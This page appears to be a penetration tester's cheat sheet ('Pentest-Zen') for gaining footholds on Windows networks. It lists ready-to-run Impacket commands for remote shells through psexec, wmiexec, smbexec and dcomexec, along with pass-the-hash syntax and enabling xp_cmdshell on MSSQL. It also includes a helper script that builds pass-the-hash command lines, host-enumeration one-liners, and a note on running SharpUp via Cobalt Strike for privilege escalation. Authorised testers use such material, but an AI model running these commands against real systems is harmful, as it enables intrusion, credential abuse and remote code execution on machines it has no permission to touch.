
The Cloud Source for Client Engagement Resources
Footholds
Using Impacket Remote Tools:

Syntax: {variable-placeholder} marks a value you supply.
Every script below takes the target as [domain/]user[:password]@target. To pass the hash, drop the password and add -hashes LMHASH:NTHASH (the LM half may be left empty). Without a trailing command (or, for psexec.py, without -c {path/2/File.ext}) the exec scripts return a semi-interactive cmd shell.

Impacket Examples Folder:
- mssqlclient.py - SQL shell on a target MSSQL server (SQL login by default; -windows-auth for a domain or local Windows account)
- psexec.py - SYSTEM shell by installing a temporary service over SMB; -c uploads and runs a file. Noisy: a service-install event (ID 7045) on the host, and the uploaded binary stays in ADMIN$ if the session dies uncleanly
- smbexec.py - Semi-interactive shell over SMB that creates a service per command; nothing is dropped to disk, but every command is another service-install event
- wmiexec.py - Semi-interactive shell via WMI (Win32_Process Create); output is read back through the ADMIN$ share
- dcomexec.py - Limited shell via DCOM; -object picks ShellWindows, ShellBrowserWindow or MMC20, and a target may block one and expose another
mssqlclient.py - example:
- python mssqlclient.py {sql-usr}:{Pswd}@{SqlSvr-ip}
  (add -windows-auth in front of the target for a domain or local Windows account)
From the SQL> prompt:
- SELECT name FROM master.dbo.sysdatabases WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb');
- SELECT TOP(5) * FROM {tbl-name};
- EXEC master.dbo.xp_cmdshell '{cmd-2-exec}';
xp_cmdshell is disabled by default and only a sysadmin login can enable it. mssqlclient.py's built-in enable_xp_cmdshell command does that (disable_xp_cmdshell reverts it; put it back when done), and its xp_cmdshell {cmd} shortcut is equivalent to the EXEC line above.
psexec.py - example:
- python psexec.py {domain}/{user}:{Pswd}@{tgt-ip}
- python psexec.py {domain}/{user}:{Pswd}@{tgt-ip} -c {path/2/File.ext}
- python psexec.py -hashes {LM-hash}:{NTLM-hash} {domain}/{user}@{tgt-ip} {cmd-2-exec}
  (pass-the-hash; the LM half may be empty, as in -hashes :{NTLM-hash}. psexec.py has no -d, -ip or -command flags: the domain is part of the target string, -target-ip overrides the address if the target is a hostname, and the command to run is the trailing argument)
wmiexec.py - example:
- python wmiexec.py {domain}/{user}:{Pswd}@{tgt-ip}
- python wmiexec.py {domain}/{user}:{Pswd}@{tgt-ip} "{cmd-2-exec}"
  (wmiexec.py has no -c upload option; it only runs commands. With no trailing command it opens the semi-interactive shell; -nooutput runs the command blind without the ADMIN$ read-back)
dcomexec.py - example:
- python dcomexec.py {domain}/{user}:{Pswd}@{tgt-ip}
  (add -object ShellWindows, ShellBrowserWindow or MMC20 in front of the target to choose the DCOM object; try another if the first is blocked)
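A shell helper, added here as an example and not code from Pentest-Zen or from the Impacket project, that builds the command lines for the scripts above (psexec.py, smbexec.py, wmiexec.py, dcomexec.py, mssqlclient.py) from separate domain, user, secret and target values. It chooses password versus -hashes auth from the shape of the secret, adds -windows-auth for a mssqlclient.py domain account, and leaves the password off the line when it contains '@', which Impacket's [domain/]user[:password]@target parser cannot take inline. It only prints the line, so the syntax can be checked before anything touches a target. Assumed: the scripts are on PATH under their installed names, the hash-detection rule (32 hex chars or LM:NT), and the sample values in the comments.

```shell
#!/bin/sh
# Added example, not from Pentest-Zen or Impacket: print the Impacket
# invocation for one of the page's exec scripts (dry run, runs nothing).
# Assumes the scripts are on PATH as psexec.py, smbexec.py, wmiexec.py,
# dcomexec.py and mssqlclient.py.
#
# impacket_cmd <tool> <domain> <user> <secret> <target> [remote command...]
#   domain : "" for a local Windows account or a SQL login
#   secret : cleartext password, NT hash (32 hex), LM:NT, or "-" to be
#            prompted (prompting is also used when the password contains '@')
impacket_cmd() {
    [ $# -ge 5 ] || { echo "usage: impacket_cmd tool domain user secret target [cmd...]" >&2; return 1; }
    tool=$1 domain=$2 user=$3 secret=$4 target=$5
    shift 5

    case "$tool" in
        psexec.py|smbexec.py|wmiexec.py|dcomexec.py|mssqlclient.py) ;;
        *) echo "unsupported tool: $tool" >&2; return 1 ;;
    esac

    # Impacket's target form is [domain/]user[:password]@host.
    if [ -n "$domain" ]; then principal="$domain/$user"; else principal=$user; fi

    opts=""
    # mssqlclient.py defaults to a SQL login; a Windows account needs -windows-auth.
    if [ "$tool" = mssqlclient.py ] && [ -n "$domain" ]; then opts="-windows-auth"; fi

    case "$secret" in
        -|*@*)
            # The target string is split on '@', so a password containing '@'
            # cannot go inline; leave it out and the script prompts for it.
            auth="$principal@$target" ;;
        *)
            if printf '%s' "$secret" | grep -Eqi '^(([0-9a-f]{32})?:)?[0-9a-f]{32}$'; then
                # Pass-the-hash: -hashes takes LM:NT and an empty LM half is accepted.
                # (A cleartext password that is exactly 32 hex chars would be misread.)
                case "$secret" in *:*) hashes=$secret ;; *) hashes=":$secret" ;; esac
                opts="${opts:+$opts }-hashes $hashes"
                auth="$principal@$target"
            else
                auth="$principal:$secret@$target"
            fi ;;
    esac

    printf '%s' "$tool"
    if [ -n "$opts" ]; then printf ' %s' "$opts"; fi
    printf ' %s' "$auth"
    # The exec scripts take the remote command as trailing positional
    # arguments; with none they drop into their semi-interactive shell.
    for arg in "$@"; do printf ' %s' "$arg"; done
    printf '\n'
}

# Sample (constructed) values: prints
#   psexec.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 CORP/alice@10.0.0.5
impacket_cmd psexec.py CORP alice 31d6cfe0d16ae931b73c59d7e0c089c0 10.0.0.5
```

Run it with `sh` and copy the printed line; for psexec.py's -c upload, put -c {path/2/File.ext} before the target yourself, since the trailing arguments here are only the remote command.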

Documenting Hosts from Cmd Shells

Windows Hosts:
- hostname & ver & ipconfig | findstr /i "ipv4"
  (cmd.exe runs the three commands in turn; the pipe applies only to ipconfig)
Nix Hosts:
- uname -a; ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'
  (chain with ; or &&, not a single &, which would background uname -a; replace eth0 with the real interface name, and grep -P is GNU-only)
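The Nix one-liner above assumes an interface named eth0 and GNU grep's -P. As an added example (not from the Pentest-Zen page), this parses `ip -4 -o addr show` for every non-loopback interface with plain awk, which BusyBox and BSD userlands also have. The ip output it is fed is a constructed sample so the parser can be exercised offline; run_on_host() is the form to paste into a real shell.

```shell
#!/bin/sh
# Added example, not from Pentest-Zen: document a Nix host without guessing
# the interface name or relying on grep -P.

# Parse `ip -4 -o addr show` lines on stdin and print "iface address" pairs,
# skipping loopback. One line per address, so aliases and extra NICs appear.
ipv4_from_ip_output() {
    awk '$2 != "lo" && $3 == "inet" { split($4, a, "/"); print $2, a[1] }'
}

# Constructed sample of `ip -4 -o addr show` from a two-NIC host (not real output).
SAMPLE_IP_OUTPUT='1: lo    inet 127.0.0.1/8 scope host lo\       valid_lft forever preferred_lft forever
2: ens192    inet 10.10.14.22/24 brd 10.10.14.255 scope global dynamic ens192\       valid_lft 85934sec preferred_lft 85934sec
3: docker0    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0\       valid_lft forever preferred_lft forever'

# Parsed pairs for the constructed sample; expected "ens192 10.10.14.22" and
# "docker0 172.17.0.1", one per line.
sample_addresses() {
    printf '%s\n' "$SAMPLE_IP_OUTPUT" | ipv4_from_ip_output
}

# Real use on a host you have a shell on: one line per host for the notes.
run_on_host() {
    printf '%s | %s | %s\n' "$(hostname)" "$(uname -a)" \
        "$(ip -4 -o addr show 2>/dev/null | ipv4_from_ip_output | tr '\n' ' ')"
}

sample_addresses
```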
Privilege Escalation Techniques
​
SharpUp.Exe (https://github.com/GhostPack/SharpUp):
-
Via Cobalt Strike Beacon: execute-assembly SharpUp.exe
​
Placeholder - more to come!:
Pentest-Zen (ExitC0de00c.com)
